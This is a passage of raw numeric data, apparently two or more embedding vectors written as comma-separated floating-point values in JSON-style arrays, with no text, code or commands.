74935,0.0027714092,0.013935842,0.010770618,0.017000685,-0.003892619,0.00511749,-0.005291131,-0.028696422,-0.0014796151,0.0017943791,0.005778558,0.013166646,0.008347246,-0.02124554,-0.013208568,-0.009029689,-0.043936107,0.009757256,-0.0021794436,-0.012101502,-0.017098151,-0.021264846,0.012842183,0.008513735,0.0012275433,0.02404669,0.004214631,-0.022303486,0.011486347,0.01499335,0.0024786855,0.025424166,-0.00835445,0.04415124,0.015009614,-0.021534402,0.012931654,-0.0006351089,-0.0048275217,-0.008912215,-0.030507699,0.0026170379,-0.0059656226,-0.0026193876,0.019776586,0.007656168,-0.009068093,0.053235624,-0.013892032,0.0010085985,0.00003075988,-0.022007985,0.0042666183,0.028047083,0.003281692,0.025018128,-0.015091905,0.011268331,0.022529965,-0.042193446,-0.012381498,-0.006515871,0.0012452636,0.004046459,0.0059606624,-0.004237093,-0.0062664193,0.005449935,-0.021529987,0.013502776,0.010769751,-0.00026880606,0.0067441347,0.011297792,0.013387612,0.010623735,-0.00062053086,-0.010523615,0.019184459,0.028112391,-0.011231255,-0.006090782,0.013538493,-0.004446236,0.0052972822,0.021615097,0.0030606666,-0.007918854,-0.021747597,0.00742363,-0.012099193,-0.007102473,0.025477745,0.013162312,0.020968938,-0.01920363,-0.010847476,0.039500374,-0.011581264,0.010464172,-0.014509626,0.022723721,-0.0014488907,0.01604319,0.008765322,0.03879058,-0.0092969965,0.008984414,-0.03147497,-0.006023181,-0.015131897,-0.024453415,-0.018328594,-0.0011693189,-0.000020660636,-0.033883248,-0.010485762,-0.000008909717,-0.011623769,-0.006541282,0.025546089,-0.0033148285,-0.03010854,-0.0031271062,-0.0005035713,0.007637653,0.022826267,0.013733877,0.007333331,-0.011119787,-0.011562792,0.011507561,-0.009965074,-0.010959942,0.012036921,-0.034901407,0.016387029,0.000949187,0.018498626,-0.026918927,0.0047508865,0.00968432,-0.021994762,-0.01171105,0.001045418,0.0045115524,0.005544139,-0.00097235624,-0.020178353,-0.017635565,0.0012316714,-0.0118249105,0.11738953,-0.022005033,0.017523749,0.004881399,0.02028255,-0.012055051,0.02131415,0.0074992953,0.016226022,-0.016869998,-0.018696373,-0.021565232,-0.014567349,0.004289349,0.017408857,0.011932651,0.0016265304,0.019270642,-0.011078456,-0.0041340827,0.009754175,0.009723141,0.010689377,-0.004020761,0.008269475,0.021604257,0.024080044,0.018147195,0.012740592,-0.0066469135,0.0022007455,-0.008532636,0.02436075,0.023644809,-0.0041812086,0.010279776,0.009549181,-0.0010106801,-0.014197409,0.01266344,0.010139575,-0.017769784,0.03254647,0.00610143,-0.009728699,-0.012162641,-0.011897662,0.0071984185,0.002508591,-0.012733559,0.002880135,-0.010955637,-0.014204911,-0.00987749,-0.024033047,0.011656114,-0.013138145,0.013613276,0.00867187,0.0050091157,-0.008502012,0.017611464,0.004136547,0.005064457,-0.009111842,0.000644683,0.015654158,-0.009080429,0.014048708,-0.014145211,-0.0040088245,-0.02566781,0.0060898373,0.027363617,-0.008627807,0.006571807,0.00044717346,-0.010855739,-0.016790269,-0.047344167,-0.010155445,0.020122156,0.018187806,0.018451557,-0.0030301905,0.024643926,-0.020144548,0.017074084,0.047217354,0.011422047,0.010930629,-0.011612241,0.0068734298,0.021931922,0.01987671,0.024696974,0.010812803,-0.012268486,-0.026706787,0.010622936,-0.019770514,-0.014235553,0.008884702,-0.0055102813,-0.013576641,0.0137739265,0.0017113716,0.0037276521,0.003735646,0.027099213,0.014956401,0.02293746,-0.006570156,-0.0050803153,-0.012402342,-0.024878444,0.0041552396,0.005703979,0.0060644806,0.006779465,0.0068444842,0.003347541,-0.0028240038,-0.02470095,0.001876557,0.12125351,0.006260692,0.010470739,0.022787923,0.008572207,0.010830544,-0.07356568,0.0020152095,0.02607977,0.015638374,-0.008905617,-0.002291553,0.008645399,0.035218846,0.0043643583,-0.01386452,-0.00044647162,-0.017846163,0.014842975,-0.01584885,0.006691198,-0.012580848,0.017041529,0.006305942,-0.027889667,-0.0028106894,0.006662993,-0.006860684,0.00072994706,-0.0149659375,0.0052752956,-0.012013239,0.016966727,-0.024629008,-0.026022058,0.014049825,0.036456265,-0.007065168,-0.031117797,0.005805114,0.032896105,0.016206399,-0.015154639,-0.032423194,-0.13020705,0.007731896,-0.0018875055,-0.03295213,0.031506285,-0.01428601,0.0061901063,0.007124585,0.012102925,0.008922749,-0.012421183,0.02043834,-0.0051041213,0.009271564,-0.01250882,0.014499127,0.016860697,-0.0038798363,0.0052178367,-0.011953565,-0.008196568,-0.0044630207,-0.015356822,-0.015754517,-0.015885888,0.014564485,0.018630771,0.04148178,-0.0011156794,0.0007331671,0.01229037,0.0047583627,-0.02046199,0.0058308328,-0.01290206,-0.013560054,-0.039292853,-0.009497107,0.0040633976,0.033851918,-0.017984891,0.011685111,-0.02502177,-0.016055366,0.007836804,0.012601148,0.018362094,0.0156152,0.0066698454,0.017838731,0.00642551,0.0073266965,-0.0076459604,-0.002705391,-0.010743272,-0.029543554,0.007147158,-0.007924543,-0.0031784214,0.004264407,-0.010574111,0.0014203852,-0.025568416,-0.01863671,0.01673819,0.0017029233,0.017946605,-0.037851017,-0.007668137,0.023838028,-0.0063095433,-0.008638293,0.018182307,-0.023077756,0.004298474,0.021597497,0.0045903367,-0.0003051067,0.0049476335,-0.0025494786,0.030838415,-0.018202918,-0.0016247334,-0.027790513,-0.008028,-0.000112079026,-0.013334772,-0.009287146,-0.010754442,-0.00806882,0.021436583,0.00059955777,0.018894069,-0.015051772,0.023941342,0.0032218832,0.027975895,-0.018034996,-0.020229075,0.0020472778,-0.003071459,-0.022703582,-0.019908752,0.0062646456,-0.000027438979,0.02567875,-0.008515367,-0.01899845,-0.031089248,-0.012381123,-0.004526338,-0.020178623,0.02768863,0.009085198,-0.035329215,0.006675007,-0.010686369,-0.0018344673,0.019811235,-0.007733898,-0.026468163,-0.00571914,-0.0062043234,0.0016270753,0.023667464,0.015876522,-0.029857209,-0.0021339168,0.008348707,0.02445035,-0.04158404,0.000579209,-0.00076862273,0.00646731,-0.0068235807,0.0005621597,-0.004836309,-0.0049168826,-0.035915934,0.010641653,0.0019856181,-0.0056953426,-0.0073775034,0.015544882,-0.008320286,-0.011553557,0.044995274,-0.016164236,0.017088057,-0.011372283,0.0111790225,0.016361812,-0.019006148,-0.019314125,0.008489044,0.06020459,-0.016219912,-0.01969788,0.00796848,-0.011423748,0.016970774,0.030194642,-0.012977611,-0.030332366,-0.014905714,-0.009081024,0.0017752519,-0.007632364,0.00215707,-0.029637385,-0.0013469503,0.024715386,0.006559421,-0.017288985,-0.01726252,0.019568905,-0.0129910875,-0.008672366,0.031619184,0.023275286,0.01366663,0.022863299,0.021865107,-0.0055572726,-0.0006111433,-0.007704484,-0.025881492,-0.015079451,0.008808424,0.014639999,-0.03658414,-0.00436867,-0.00838742,0.02143838,-0.0063476204,0.009139393,0.020298634,0.011355136,-0.02019524,0.010921598,-0.020371733,0.0057577067,0.011318797,0.001546916,-0.01723205,0.0027926667,0.02921657,0.00421849,-0.007083878,0.0071904166,-0.013301747,-0.023584595,0.0001260129,0.0041984976,-0.033022054,0.024379004,-0.007189523,-0.012400163,-0.009703291,-0.0058639958,-0.0013064389,0.00072793366,0.0023045014,0.013443802,0.02026566,0.0011020177,0.008340304,-0.023927052,0.0070981416,-0.0011372068,-0.0044709346,0.0008647526,0.010234415,-0.0042231707,0.010168998,0.021308988,0.015247652,0.016313296,-0.010259885,-0.025147038,-0.03344856,-0.02109116,0.02318322,0.012023851,0.008143247,0.01984066,-0.0069333008,0.0125231175,-0.0052790823,0.006400834,0.02085447,0.015031671,0.010219422,0.016105985,-0.010635228,-0.011891215,0.01280104,0.0065174885,-0.0052454183,-0.01897623,-0.023031337,-0.014729076,0.0076752445,0.009290473,-0.02559122,0.0148097975,-0.023294076,0.0025971215,-0.03984126,0.0056633223,0.027646277,0.010624384,0.013484912,0.029770266,-0.0012319526,-0.00730047,0.010592471,0.006628674,-0.0066771503,-0.012017701,-0.005309275,-0.004711379,0.0040877745,-0.028037384,0.036783177,0.022768445,0.023287073,-0.0043333797,-0.020822208,-0.007833827,-0.014210083,0.01295271,-0.0051543736,0.006093714,0.009285914,-0.0314645,-0.023030955,0.0046958122,0.0016593729,0.0012162797,0.010033927,-0.0030230198,-0.004084025,-0.021032812,0.009935871,-0.01911127,0.010221203,0.0047203978,0.016299808,0.0065530855,-0.0050811046,-0.0035736829,-0.0036451668,-0.013659436,0.0073406217,-0.00045044045,0.025349347,0.0120961955,0.015634082,-0.0012294537,0.041725494,0.022477312,0.005294804,0.011200184,0.0029484767,0.002186619,-0.025994781,-0.002264686,-0.0053445078,0.017800523,-0.0053675985,0.022021962,0.012922314,-0.014935539,-0.02560842,0.00120549,0.012766146,0.009873275,0.00268625,0.0009974627,0.0030371246,-0.0066286623,0.03187323,-0.015923262,0.0025029192,0.0023503576,0.013223068,-0.0004359617,0.008514033,-0.02706493,-0.009368153,0.010213226,-0.020315593,0.00653549,0.007879136,0.020347832,0.0063464437,-0.017930055,-0.007753986,-0.014752668,-0.008542709,-0.010121171,-0.0151367,-0.013507266,0.00452169,0.0028420927,0.005323587,-0.0061428533,0.000890434,0.0027939857,-0.0042432076,-0.025366565,0.023902476,0.009123991,-0.034400728,-0.012200517,0.004999321,0.00311994,-0.007049326,0.0011159292,-0.008002215,-0.014747487,0.03725211,-0.01633893,-0.0054482035,0.0012680559,0.028749943,0.038595967,-0.006952113,0.000043574077,-0.014132858,-0.006528896,-0.023367591,-0.022560231,0.014934468,0.020836912,-0.040800218,-0.01248885,0.008573459,0.012434863,-0.00025661194,-0.0065407273,0.029057244,0.0080232555,0.029416543,-0.0035397392,-0.026784051,-0.054445297,-0.002631526,0.01167082,-0.024726642,-0.005771261,0.03158702,-0.010995447,-0.026090607,-0.006000619,-0.0015919233,0.00821138,0.0046539106,0.010787005,-0.0077245715,0.016958453,0.013903628,0.0067037432,0.00554977,-0.0081516085,-0.0029883652,-0.018387772,0.0038898794,-0.0022625006,-0.019656707,0.015313932,-0.016821323,0.011043658,0.0066680633,0.035019178,-0.011032696,0.018633094,0.008089222,-0.013002972,-0.009211177,0.011829687,0.010921104,-0.005453952,-0.038589574,-0.02753995,0.018145347,0.0015085293,-0.025620155,-0.000027411832,-0.0051661027,-0.004384599,-0.0029840055,0.0023789923,-0.004402017,0.0056675076,-0.003246308,-0.0034422115,0.004980356,0.005069057,0.0013543719,0.014486007,-0.013856296,0.009017909,-0.0013058757,0.0010144332,-0.000101524995,0.014950404,-0.005990704,0.017227523,0.018406408,0.014184989,0.026658846,-0.014609592,0.021954685,-0.018997721,-0.011786575,-0.009862927,-0.005544924,-0.023602802,-0.0013867292,-0.0067067766,-0.024281286,-0.015925158,-0.008858204,0.0108162025,-0.014923505,-0.0056550996,-0.16372146,0.022261044,-0.0039310018,-0.030083872,-0.002140892,-0.013688436,0.016069354,0.01600812,0.0016717087,-0.02193615,-0.010084171,0.03596459,-0.013021728,0.005353103,0.014495099,-0.005211512,-0.025740996,0.012228057,0.009381542,0.010165876,0.0022483324,-0.013889528,-0.006376478,-0.011612236,0.020676864,-0.0010525361,0.0071038413,0.014107652,0.00344572,0.01392968,0.011945699,-0.0006139032,0.002195112,-0.0093748905,-0.013334022,-0.0022530684,-0.017042927,0.0030974194,0.0014155605,0.0053123506,-0.010619786,0.0025799735,0.010119131,-0.007060095,0.013787698,-0.020015644,0.0028849444,0.028751345,0.005292778,0.024315674,-0.0019316291,0.0051104324,-0.0020809243,-0.010058848,-0.009299162,0.0045030476,0.006689537,0.0008405264,0.00074978854,0.011811898,-0.0012122822,-0.028405692,0.004798809,-0.037681825,0.009062209,-0.01937412,0.015914863,0.015874911,-0.024154318,-0.0022098923,-0.0063097836,0.007666779,0.0014577411,-0.0013704301,-0.0049706744,0.017842695,-0.008035596,0.023307038,-0.0019629905,0.022161387,-0.035625823,-0.0066503966,0.005806765,0.019518856,-0.021992555,-0.025576454,-0.004572753,0.0139259305,0.0050913077,0.027351266,-0.0019157542,-0.0063373637,-0.01589865,-0.016670596,-0.008174031,0.006522504,-0.010830448,0.0021011864,-0.01847439,-0.0068402844,0.012227604,-0.009449333,-0.0034356297,-0.010386357,-0.12577306,-0.010451553,0.030673396,0.0063960515,-0.005977264,-0.035712957,0.03591098,-0.003524884,0.023873068,-0.0055428445,-0.007240459,0.017356344,-0.015302593,-0.007445458,0.008955528,0.012394524,-0.023172945,-0.004983593,0.017955778,-0.0044178353,-0.0009939491,-0.023770314,0.01086557,0.006455128,-0.0012183025,0.020871023,-0.0013123717,0.035191838,0.0077328156,0.013847462,-0.0030653076,0.021487698,0.0010519483,-0.014065654,-0.06952074,-0.014735172,-0.0029295257,-0.016977094,0.009059619,0.008445011,-0.002241879,-0.0125833,0.005478207,0.010455828,-0.006297223,-0.004235699,-0.0015118826,0.04123663,-0.0038396579,-0.025127346,0.018693935,0.014793305,-0.002565373,0.0104968855,0.003950962,-0.008073861,0.006827396,0.013920234,0.0023116916,-0.0007576193,-0.014808305,0.0012789823,-0.03158961,-0.005932544,0.002361458,0.010568009,-0.009149603,0.014730643,-0.010740543,0.0062183966,-0.0055972943,0.03572389,0.017168276,-0.018033832,0.03575865,-0.016036764,-0.0022450308,0.020507518,0.028295532,0.014672484,0.007544284,-0.023723274,0.013940573,0.010126626,-0.027890258,0.018885208,0.023078272,-0.0023788942,-0.014477491,0.010631318,0.006974526,0.006295948,0.007929893,0.028361004,0.00878988,0.0068615577,0.039640017,-0.0053810137,-0.0043029757,0.014987068,-0.02763303,-0.021083856,0.011644619,0.025355307,-0.015326033,0.023177445,0.028246345,0.0007181099,0.003966363,0.012479892,-0.017840864,0.018395396,-0.020510688,-0.00059979566,0.010131185,-0.0067787,-0.00078309537,0.0184265,0.014727999,-0.014205619,0.033944212,0.0045926636,0.0000525261,-0.0122760795,-0.0041238917,-0.007730853,-0.0190049,0.014200536,0.0018315272,-0.019532567,-0.006511526,0.0049432307,0.0034519986,-0.0114143845,0.026001878,0.006843535,0.0004990153,0.013671475,0.0053090374,-0.007716211,0.015960637,0.011372669,0.0046411674,0.010909711,0.0049106847,-0.006830205,-0.021402292,-0.00928238,-0.014949039,0.0154702095,0.0007586744,-0.014338154,0.029512726,-0.0026499012,0.0056112227,0.0019184946,-0.0030916382,0.00030413823,0.010292531,0.016651127,-0.0009790834,0.024596177,0.03129404,0.01222153,0.0033016766,-0.008736546,-0.011090297,0.0018040172,-0.012344405,0.004941727,-0.007685196,0.004869449,0.02103755,-0.054747283,-0.002215452,0.0022699682,0.0008948708,0.004512369,0.017140558,0.020952245,0.00018103761,0.00076821755,-0.01769646,-0.007275548,-0.011317361,0.01701911,-0.010748935,-0.015742132,-0.023756165,-0.017668512,0.04199545,-0.00809399,0.000906285,-0.021154925,0.01764282,0.019414276,0.004838666,0.013162062,0.016184874,-0.0046194466,-0.03501017,0.014389384,-0.006114532,-0.002693909,0.0022479794,0.009241987,0.00261836,0.032283157,0.012304259,-0.006283587,-0.020037837,0.010822013,-0.015669078,-0.0039076144,0.006609554,0.0036602053,-0.009270505,-0.012146093,0.043501418,0.011449198,-0.006037605,-0.014431594,0.00120467,0.0054071466,-0.0053550303,0.031831305,0.026005467,0.00706715,-0.032509446,-0.018904611,-0.0041287816,-0.009848858,-0.016108971,0.00407982,-0.012082455,-0.0076806042,0.016675252,0.0143557135,0.010310663,-0.0077894903,0.017599456,0.010342799,0.022819927,0.029720606,0.013827466,0.0032848462,0.014436998,-0.0010759634,0.0061054663,0.030911181,0.020704126,-0.008043836,-0.01510553,-0.008699385,0.0036048437,0.011588293,0.0039016444,0.02694985,-0.00037700628,0.013951491,-0.026341679,0.007947117,-0.02157238,-0.020676663,0.004644667,0.001897292,0.019178284,-0.020950262,-0.0096442085,0.0058092545,0.009650712,0.01410944,-0.007948378,0.033629213,-0.017414983,-0.007094369,0.0020348388,0.00031109492,0.0008779037,-0.001314328,0.0031274764,0.0061333207,-0.009376077,0.018211728,0.021982098,0.016821805,-0.0025979693,0.01355825,-0.0012712723,-0.023371445,0.019993499,0.016224498,0.0020807937,0.009127353,-0.00028584938,0.0066855596,0.005571981,-0.0012010759,-0.00009605696,0.008673125,0.017428033,-0.01208022,-0.0053931414,-0.006434068,0.008675345,0.017514376,0.00038603664,0.020579478,0.009816031,-0.011003949,-0.010424551,0.014024569,-0.009713746,0.0036921524,0.00043827744,0.008564614,0.0257148,-0.013214549,-0.04730624,-0.022675946,-0.0007119532,-0.010236046,0.03172214,-0.017786035,-0.001934812,-0.00833807,-0.00042791007,0.0371076,-0.015414419,-0.0016727877,0.01714791,-0.017388316,0.0012942767,-0.0047013876,0.0142411,0.023626575,0.001217244,0.0332038,-0.008766708,0.00043388334,-0.0038811583,0.01912528,0.01634447,0.0019292107,-0.0033786667,0.0065661417,-0.004273318,-0.0061897566,-0.008636688,-0.010291837,0.002796227,0.0034504924,0.012991254,-0.023601348,-0.010727805,0.045652974,-0.05231073,0.002379656,-0.0055839685,0.008225978,-0.005482942,-0.00011440904,0.021796895,-0.00847163,0.01286976,-0.00030900937,-0.027101474,0.0059916493,-0.010297562,0.015264162,-0.013339663,0.012349846,-0.017606018,-0.02869215,0.003858993,-0.07917741,-0.0074887294,0.015415289,0.024763163,0.021791823,-0.018799288,-0.009386227,-0.013703076,-0.0003842226,0.02575806,0.016696552,-0.006732556,0.0027143094,0.007844733,0.022491727,-0.010571364,-0.020982629,-0.008385564,0.004416959,-0.019063631,-0.00019194468,0.0019085271,-0.0037593264,-0.013315486,0.0012157342,0.01887669,0.00414631,-0.002794526,0.00070697203,-0.0003115107,-0.015641812,0.00021960208,0.004600566,-0.018805899,-0.02014534,0.0054557887,-0.02035751,0.01624307,-0.01857785,-0.015797805,-0.01311716,0.010965532,-0.0023031565,0.020331109,-0.015779076,0.00587105,-0.022901589,-0.0058082594,-0.004712474,-0.005175694,-0.010002014,0.030456344,0.0021378985,0.014234523,-0.0021810788,-2.5160594e-7,-0.0042181117,-0.026426159,0.031958546,0.0038932117,0.0027311123,-0.0031171467,0.0035817167,0.007317235,-0.0074188947,0.0043977783,0.007685026,0.014778557,-0.004443568,0.020024506,0.017606044,-0.01580946,-0.0180641,0.0022247378,-0.0055221156,0.0023240743,0.023933994,-0.0076503144,-0.01790889,-0.010364209,0.05629075,-0.0021697155,0.03795021,0.021975474,0.0071669184,0.01628315,-0.0016946418,0.02040988,0.008560821,0.0059447805,-0.0067907847,-0.005375216,0.028774338,0.011058867,0.01011431,-0.006663018,-0.020099504,0.013022246,-0.0020830857,-0.010873038,0.009756494,-0.0023555185,-0.009007102,0.003056059,-0.012966216,-0.009555491,0.007133115,-0.019615224,-0.01250476,0.0026407791,-0.007616887,0.03065598,0.027675983,0.02931168,0.021590753,0.0154146375,-0.010433146,0.0101813385,-0.013431486,-0.02518818,-0.008073386,-0.015256544,-0.0012662102,0.023508241,0.0028616274,0.00199097,0.007340896,-0.009827583,-0.011658829,0.012609195,0.0012867079,-0.0040856274,0.01305585,0.009609782,-0.0034044315,-0.018555338,-0.02119429,0.014364604,-0.005833636,0.023248749,-0.008539358,-0.025140252,-0.009268136,-0.0003701237,-0.028331498,0.018146737,-0.0109148035,-0.005738562,0.011505936,-0.017218733,0.0032494455,0.0035889908,0.0013370686,-0.030989133,0.006859765,0.02335899,-0.0042482954,0.0062317536,-0.01500793,-0.012988281,-0.0032847873,0.007198224,-0.026974723,-0.013242693,-0.02109491,0.021389687,-0.0010627055,-0.010849586,-0.0000024477145,0.012754874,-0.024669455,0.005672261,-0.0021879533,-0.009635723,-0.030969502,-0.023740068,0.028625041,0.036313627,0.007572725,-0.008360681,-0.024261799,0.00837127,-0.016028358,-0.009259164,0.014940711,-0.009691587,-0.011379644,0.0063503813,0.009144879,-0.026725052,0.0027464365,-0.016908009,-0.018031456,0.00030091422,0.010446603,0.018381948,0.012764044,0.0023059836,-0.013245419,0.024400188,-0.001703833,0.014131213,-0.006999627,0.021879211,0.044672854,-0.0014491385,-0.012580289,0.021044364,-0.02508272,-0.009462882,-0.01962379,0.020504283,-0.003102958,0.12597562,-0.0004447404,-0.00062513136,0.005931899,-0.0060645607,0.0013482407,0.01476889,-0.0063496367,-0.011429344,0.0057935053,0.019202014,-0.0014075073,0.016147435,0.014331574,-0.015609337,0.022599444,0.004594938,-0.016506014,0.01836097,-0.0037982315,0.027051019,-0.008881762,-0.032894745,-0.037821922,-0.027544571,-0.06072767,0.040577684,0.0025108461,-0.0064870645,0.029700356,0.017215092,0.0012260638,0.0015521889,0.0049134567,-0.018425152,0.030526923,-0.0021845528,-0.023363661,0.01412192,-0.024857167,0.0030283076,-0.00020368324,0.02099511,-0.033157207,-0.012828676,-0.01385696,0.016376616,0.022186734,-0.0053316033,-0.013424129,-0.004816224,0.0042154957,0.0056298017,-0.004289939,-0.013887191,-0.022736957,-0.005248359,-0.019188639,0.020126384,-0.016503109,0.008719066,0.0019123666,0.0012211808,-0.0043022293,0.009223857,-0.0010436806,-0.01569471,-0.020805582,-0.013770805,-0.01817236,0.019305866,0.0047497693,0.023294274,-0.0071217604,-0.0032142615,-0.0012866323,-0.004936167,-0.005963114,0.023294048,-0.006582875,0.016492393,-0.0029382762,0.0050631296,-0.00683379,0.0136512155,0.0139368875,-0.011874914,-0.0061341743,-0.005690372,-0.0048189033,-0.0021553193,0.018617038,0.029456576,0.04928625,-0.018117864,0.006245158,0.013201199,-0.0056637162,-0.020920638,0.0053344984,-0.029214356,-0.018817233,0.0004193087,0.018921783,-0.00053226104,-0.015888905,0.0054922663,-0.0097464165,-0.0042085582,-0.004326343,0.0023163417,0.038653888,0.016486939,0.015302682,0.0079198135,0.03160894,-0.028981155,-0.010456152,0.0063154413,-0.022158325,0.0034729803,0.023292737,0.007951388,0.021007499,0.002586449,0.0086055,-0.012804387,-0.009454023,0.017988166,0.011120726,0.0018725786,-0.01999634,0.012701874,0.01481794,0.008282406,-0.012897622,0.032638505,-0.0072188107,0.022491517,-0.01465868,0.0050363364,-0.0077249375,-0.011753314,-0.008577517,0.014268379,-0.029711263,0.03165698,0.0006320955,0.0047063287,-0.0008896083,-0.017454978,0.0033800795,-0.020432401,-0.011872237,-0.010534392,-0.0009493178,-0.0033969525,0.025382293,0.019405553,-0.022144122,0.023310713,-0.014604756,0.009535543,-0.04876799,0.017678047,0.0024717243,0.018121453,-0.014247474,0.009717227,-0.008327461,0.0015765424,-0.012930377,-0.0046032323,-0.0094165,-0.020785704,0.012106385,0.0006063002,0.026068917,-0.01330664,0.0029068775,0.013151219,0.011662383,-0.010285796,-0.007853722,0.019776514,0.0035525921,0.017821848,-0.00006707788,-0.011018996,0.037088137,0.00043612684,-0.021252554,0.002146683,0.026574148,-0.027486796,0.024035098,-0.001857383,0.028261766,-0.0025950873,-0.035287876,0.03152844,0.014012921,0.025040628,-0.023866998,0.003824212,-0.009660829,-0.015334315,0.000012778172,-0.008482292,-0.019490974,0.0051669264,-0.006994241,0.02093578,-0.015421564,0.0074340734,0.016191768,-0.0029058617,-0.019033767,-0.015553315,-0.0030278899,0.0012028734,0.009477737,-0.011348567,-0.0062184,0.021877533,0.014423001,-0.025174543,-0.0070519648,0.016561186,-0.023334911,-0.0077793766,0.00017168469,0.0045671505,-0.011973708,-0.02385521,0.00695316,0.04501503,0.018235443,0.00079268083,0.0192841,-0.023655485,0.0028030486,0.021059524,-0.0046888557,-0.016597433,0.0045405347,0.0026073128,-0.023330942,0.0076671247,0.0006343743,-0.041124016,-0.015267411,-0.012016,-0.018146101,-0.00969962,-0.020878598,-0.007067689,0.019755907,0.000576412,-0.013978575,0.0143243065,0.0106225945,-0.009045258,0.029303195,-0.0070910915,-0.003191833,-0.013980459,0.00054455793,-0.006814247,-0.012898632,-0.015168696,0.0084577985,-0.013257299,0.04002281,0.016758934,-0.0017882395,0.007469127,-0.0015796908,0.009711021,-0.012862664,0.0186189,-0.0033535508,0.0033503745,-0.013730502,0.006139137,0.010233827,-0.026088288,0.04100517,0.069397196,-0.07122841,-0.0042201527,0.007795733,0.00044767145,-0.0062559242,0.029765498,0.010252187,-0.018092135,-0.009709859,0.021236468,0.01919668,-0.013524464,-0.06450843,0.0020122745,0.0025994047,-0.015308124,0.006278527,-0.012984323,0.0042058257,-0.0056537697,0.0029641576,-0.0012821301,-0.001310564,-0.011544919,-0.01445999,-0.0028340372,-0.020107673,0.00935519,-0.011035521,0.028132139,-0.0061671147,0.004625932,-0.012082255,0.005418248,0.022300078,-0.0047947466,0.017069066,0.0032405271,0.006577574,-0.038504943,-0.0037357316,-0.0010385601,0.010102954,0.0055547855,-0.0061122114,0.00068302,0.012816194,-0.014440495,0.11068192,-0.020432118,0.027295511,0.00875662,-0.013039518,-0.009951825,0.020181721,0.03362785,0.0069424673,0.019597558,0.014222066,-0.013972673,0.012533172,0.028560357,0.0022029176,-0.0121779805,-0.0045086793,0.12991916,-0.007501175,0.033204358,0.010226054,0.017480446,0.0047526252,-0.00025582442,0.024179604,-0.06797351,0.006354752,-0.030695152,0.0029606577,0.01837236,-0.0350817,0.017048638,-0.009466791,-0.0061075618,-0.011304197,-0.005205402,0.017249072,0.015069656,-0.021852951,-0.01905623,0.0036442182,-0.0033668894,-0.0051399134,0.001178747,-0.03554039,0.01617576,-0.027241614,0.009312343,0.026178401,0.029132683,-0.001882914,-0.0055855177,0.0011156672,-0.007375518,0.0041674287,0.022541283,0.007100155,0.006991979,-0.0131743075,0.006057923,0.0010040968,0.013589116,-0.015560996,0.024874942,-0.023988605,-0.0035510638,-0.0056477864,0.0071913158,0.020471519,0.018073767,0.04172483,-0.0038155792,-0.017474018,-0.00078544836,0.024218976,-0.00037368818,-0.01758381,0.009830996,0.006017752,-0.0111379055,0.035800256,-0.0025281738,0.005910935,-0.0015213914,0.014418594,0.012703291,0.010969957,-0.0056346506,0.04183914,-0.019325785,0.017751003,0.023353685,-0.014420254,0.00432254,0.015380294,0.03373254,0.003219407,-0.014200172,0.0045972285,-0.014805028,-0.009227318,0.012790036,-0.009415746,0.0037698788,-0.0050792415,0.008443883,-0.009256633,-0.017203383,0.001500783,-0.0006488026,0.0050635566,-0.0056636594,-0.002731883,0.018285334,0.0042774603,-0.016045483,-0.018620865,-0.007307496,-0.018945124,0.0003848388,0.00865204,-0.0160448,-0.0052103805,-0.00091241347,-0.034717895,0.007974904,0.013987397,0.016218614,-0.018913005,-0.009949007,-0.004566083,-0.0073106242,0.028963689,0.0667594,-0.00757398,-0.010819939,-0.00038482706,-0.039109528,-0.024339423,-0.012460773,0.0050644684,0.016264312,0.010378016,0.0044886526,0.0064822026,-0.008836436,0.0146446265,0.0016746119],[0.005210764,-0.0021244485,-0.01315219,-0.023304483,0.01659641,-0.01964188,-0.0025652023,0.009965061,-0.018807132,-0.013413966,-0.0026008002,0.032036196,-0.008012738,-0.009386031,-0.02681159,-0.0016337318,0.0113071585,-0.004968028,-0.012087818,-0.0020374916,-0.001796901,0.002555398,0.02232831,-0.00092591695,0.009653525,0.010510205,0.00021915196,-0.0024839875,0.005515976,0.016719423,-0.012342383,0.023840701,0.019971732,-0.011500319,0.018176379,0.0018382033,-0.009110018,-0.024472235,0.002489015,-0.0070928866,-0.012019117,0.015056095,0.001000042,0.0052097896,-0.033090755,-0.004656696,0.0064306757,0.012649155,-0.02216959,-0.0006393921,0.021915616,-0.00089012174,-0.023217851,0.01702178,-0.008404311,0.025272734,0.003553805,-0.013741622,0.009274338,-0.012640611,-0.0069404356,0.021676775,-0.008088839,-0.014381135,0.02267797,-0.028657932,0.0056680986,-0.0023145876,-0.008100732,-0.008719595,-0.013661791,0.004734545,0.01609487,-0.0016591381,0.018889416,0.012594403,0.0009889283,-0.012901892,-0.011357219,0.019871365,-0.0027063119,-0.015833128,0.006375104,-0.006954082,-0.004075016,0.0012695808,-0.0040898793,-0.0080838315,-0.0036107942,-0.016981743,-0.010995992,0.0023739089,0.0013882015,0.009759697,-0.025737869,0.016256686,0.011004339,-0.010142361,-0.003125905,0.019509802,-0.03918345,0.0076518515,-0.0112195425,0.012815316,0.01037754,-0.021249233,-0.0029979232,-0.004310817,-0.011567155,-0.0049959444,-0.007139762,0.0016358851,0.0023491953,-0.010967333,0.0023100632,-0.008554867,-0.0012867034,-0.0052408027,-0.021719662,0.009244507,0.004021228,0.018312344,0.009441073,0.004497501,-0.0047295713,-0.01172183,-0.016393464,0.008992374,0.008179002,0.018226115,0.0008792744,0.02181398,-0.011521118,-0.009938981,-0.005749625,-0.0042010793,0.00007983823,-0.014947037,-0.0054548816,-0.009935948,0.010116702,-0.008118609,0.01634319,-0.0062934435,0.015576633,0.018679084,-0.011417182,0.017906252,0.026927546,0.0031108316,0.006279118,-0.005379943,-0.018782167,-0.0218179,-0.008677997,0.025426485,0.0156216305,-0.01655412,-0.020819759,-0.01138657,-0.016380405,0.012097017,0.012052901,-0.016147386,-0.0062623546,-0.035659607,0.013458872,-0.009637482,-0.009003849,0.0039708894,0.01898514,0.020557266,0.022577405,0.0061019952,0.018832609,0.029065574,0.0022882402,-0.013328098,-0.0049053337,-0.009756334,-0.0004255698,-0.0055485494,0.013514375,0.013057212,-0.008760438,0.025470052,0.015549041,0.0074614994,-0.019410823,-0.010563559,0.0011779411,-0.019502923,-0.00983767,0.012715234,-0.0046214014,-0.032479305,-0.0063316356,0.10924521,0.011783959,-0.00062934746,-0.018284062,-0.0023112993,0.0071468847,-0.019892665,-0.011101092,0.012845112,0.00047163942,-0.010276768,0.018689929,-0.011568541,0.024406513,-0.028357843,0.0003202276,-0.0028359294,-0.0020993107,-0.065463275,0.0033237035,0.012005848,0.012607731,0.0030455065,0.0015512027,0.0067756227,0.008645325,-0.033559028,-0.005212351,-0.0062859324,0.0014126687,0.0054228,0.008959568,-0.018758604